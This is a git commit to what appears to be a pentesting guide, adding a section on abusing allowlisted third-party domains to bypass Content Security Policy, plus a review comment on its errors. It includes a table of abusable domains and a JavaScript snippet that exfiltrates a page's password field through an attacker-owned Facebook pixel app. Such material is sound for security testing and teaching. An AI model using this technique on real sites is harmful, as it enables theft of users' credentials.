Update CSP methods for third parties

Felipe Molina 2023-10-23 15:43:34 +01:00
parent e0975f3af6
commit 121d793ce0
1 changed files with 47 additions and 0 deletions


@ -287,6 +287,53 @@ https://www.youtube.com/oembed?callback=alert;
The same vulnerability will occur if the **trusted endpoint contains an Open Redirect** because if the initial endpoint is trusted, redirects are trusted.
### Third Party Abuses
As described in the (following post)[https://sensepost.com/blog/2023/dress-codethe-talk/#bypasses], there are many third party domains, that might be allowed somewhere in the CSP, can be abused to either exfiltrate data or execute JavaScript code. Some of these third-parties are:
| Entity | Allowed Domain | Capabilities |
|--------|----------------|--------------|
| Facebook | www.facebook.com, *.facebook.com | Exfil |
| Hotjar | *.hotjar.com, ask.hotjar.io | Exfil |
| Jsdelivr | *.jsdelivr.com, cdn.jsdelivr.net | Exec |
| Amazon CloudFront | *.cloudfront.net | Exfil, Exec |
| Amazon AWS | *.amazonaws.com | Exfil, Exec |
| Azure Websites | *.azurewebsites.net, *.azurestaticapps.net | Exfil, Exec |
| Salesforce Heroku | *.herokuapp.com | Exfil, Exec |
| Google Firebase | *.firebaseapp.com | Exfil, Exec |
If you find any of the allowed domains in the CSP of your target, chances are that you might be able to bypass the CSP by registering on the third-party service and, either exfiltrate data to that service or to execute code.
For example, if you find the following CSP:
```
Content-Security-Policy: default-src 'self www.facebook.com;
```
or
```
Content-Security-Policy: connect-src www.facebook.com;
```
You should be able to exfiltrate data, similarly as it has always be done with (Google Analytics)[https://www.humansecurity.com/tech-engineering-blog/exfiltrating-users-private-data-using-google-analytics-to-bypass-csp]/(Google Tag Manager)[https://blog.deteact.com/csp-bypass/]. In this case, you follow these general steps:
1. Create a Facebook Developer account here.
1. Create a new "Facebook Login" app and select "Website".
1. Go to "Settings -> Basic" and get your "App ID"
1. In the target site you want to exfiltrate data from, you can exfiltrate data by directly using the Facebook SDK gadget "fbq" through a "customEvent" and the data payload.
1. Go to your App "Event Manager" and select the application you created (note the event manager could be found in an URL similar to this: https://www.facebook.com/events_manager2/list/pixel/[app-id]/test_events
1. Select the tab "Test Events" to see the events being sent out by "your" web site.
Then, on the victim side, you execute the following code to initialize the Facebook tracking pixel to point to the attacker's Facebook developer account app-id and issue a custom event like this:
```JavaScript
fbq('init', '1179785999289471');
fbq('trackCustom', 'My-Custom-Event',{
data: "Secret ingredient is: '"+document.getElementById('user-password').innerText+"'"
});
```
As for the other third-party domains specified in the previous table, there are many other ways you can abuse them. Refer to the previously referred (blog post)[https://sensepost.com/blog/2023/dress-codethe-talk/#bypasses] for additional explanations.
### Folder path bypass
If CSP policy points to a folder and you use **%2f** to encode **"/"**, it is still considered to be inside the folder. All browsers seem to agree with that.\
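Review bot: the first example policy, `Content-Security-Policy: default-src 'self www.facebook.com;`, is malformed (the closing quote after `'self` is missing), so a reader copying it into a server config gets a directive browsers will not parse as intended; it should read `default-src 'self' www.facebook.com;`. The three links written as `(following post)[https://sensepost.com/...]`, `(Google Analytics)[https://www.humansecurity.com/...]` / `(Google Tag Manager)[https://blog.deteact.com/csp-bypass/]` and `(blog post)[https://sensepost.com/...]` have the markdown link syntax inverted and will render as literal parentheses followed by a bracketed URL; use `[text](url)`. Step 1, "Create a Facebook Developer account here.", has no link behind "here", and step 5 leaves the parenthesis opened at "(note the event manager could be found in an URL similar to this:" unclosed. More importantly, the steps never say where `fbq` comes from on the victim page: the snippet calls `fbq('init', '1179785999289471');`, but the only allowed origins in the example policies are `www.facebook.com` / `*.facebook.com`, so the text should state that the target must already load the Facebook pixel SDK (or show the equivalent request the SDK sends) for this to work under that policy. Finally, the hard-coded app id in the `fbq('init', ...)` call would be clearer as an `<attacker-app-id>` placeholder, since the prose says it must point to the attacker's own app.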